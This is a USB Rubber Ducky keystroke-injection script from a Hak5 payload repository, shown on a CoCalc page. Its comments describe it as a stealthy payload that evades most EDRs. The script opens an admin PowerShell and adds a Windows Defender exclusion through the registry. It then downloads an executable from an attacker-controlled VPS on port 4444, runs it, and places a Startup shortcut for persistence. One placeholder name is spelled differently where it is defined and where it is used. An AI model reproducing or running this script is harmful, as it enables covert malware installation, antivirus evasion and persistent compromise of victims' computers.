Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/general/The-Perfect-Stealthy-Payload/payload.txt
2968 views
1
REM Title: The-Perfect-Stealthy-Payload

2
REM Author: zb0r

3
REM Description: Opens PowerShell as admin, creates a folder in Windows/temp called Cache, adds exclusion in Defender, downloads the payload from VPS/ inside the Cache folder, executes it, and adds it to startup

4
REM Target: Windows

5
REM Note: This evades most EDRs. // Delay is too big for testing purposes, can be lowered significantly. // I removed every instance of my VPS.

6
REM Note: replace VPSIPHERE with the IP of your VPS and the correct port (ex:4444) and the name of your payload (ex: Shelzy.exe)

7
REM Version: 1.0

8
DEFINE #VPSISHERE 0.0.0.0

9
DEFINE #EXE_NAME Shelzy.exe

10
DEFINE #PORT 4444

11
EXTENSION PASSIVE_WINDOWS_DETECT

12
    REM VERSION 1.1

13
    REM AUTHOR: Korben

14


15
    REM_BLOCK DOCUMENTATION

16
        Windows fully passive OS Detection and passive Detect Ready

17
        Includes its own passive detect ready.

18
        Does not require additional extensions.

19


20
        USAGE:

21
            Extension runs inline (here)

22
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic

23
            boot delay

24
            $_OS will be set to WINDOWS or NOT_WINDOWS

25
            See end of payload for usage within payload

26
    END_REM

27


28
    REM CONFIGURATION:

29
    DEFINE #MAX_WAIT 150

30
    DEFINE #CHECK_INTERVAL 20

31
    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2

32
    DEFINE #NOT_WINDOWS 7

33


34
    $_OS = #NOT_WINDOWS

35


36
    VAR $MAX_TRIES = #MAX_WAIT

37
    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))

38
        DELAY #CHECK_INTERVAL

39
        $MAX_TRIES = ($MAX_TRIES - 1)

40
    END_WHILE

41
    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN

42
        $_OS = WINDOWS

43
    END_IF

44


45
    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION

46
        IF ($_OS == WINDOWS) THEN

47
            STRING HELLO WINDOWS!

48
        ELSE

49
            STRING HELLO WORLD!

50
        END_IF

51
    END_REM

52
END_EXTENSION

53
DELAY 100

54
GUI r

55
DELAY 500

56
STRING powershell

57
DELAY 500

58
CTRL SHIFT ENTER

59
DELAY 1000

60
LEFTARROW

61
DELAY 1000

62
ENTER

63
DELAY 1500

64
REM Create Cache folder in Windows/temp

65
STRINGLN mkdir "$env:windir\temp\Cache"

66
DELAY 500

67


68
REM Add exclusion in Defender for Cache folder via registry manipulation

69
STRINGLN Start-Process powershell -Verb RunAs -ArgumentList 'New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" -Name "C:\Windows\Temp\Cache" -Value "C:\Windows\Temp\Cache" -PropertyType String -Force'

70
DELAY 500

71


72
REM Download payload from VPS Invoke-WebRequest

73
STRINGLN Invoke-WebRequest -Uri "http://#VPSIPHERE:#PORT/#EXE_NAME" -OutFile "$env:windir\temp\Cache\#EXE_NAME"

74
DELAY 3000

75


76
REM Execute the downloaded payload

77
STRINGLN Start-Process "$env:windir\temp\Cache\#EXE_NAME"

78
DELAY 500

79


80
REM Add #EXE_NAME to startup

81
STRINGLN $s=(New-Object -COM WScript.Shell).CreateShortcut("$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\Shelzy.lnk");$s.TargetPath="$env:windir\temp\Cache\#EXE_NAME";$s.Save()

82
DELAY 500

83


84
STRING EXIT

85
DELAY 300

86
ENTER

87


88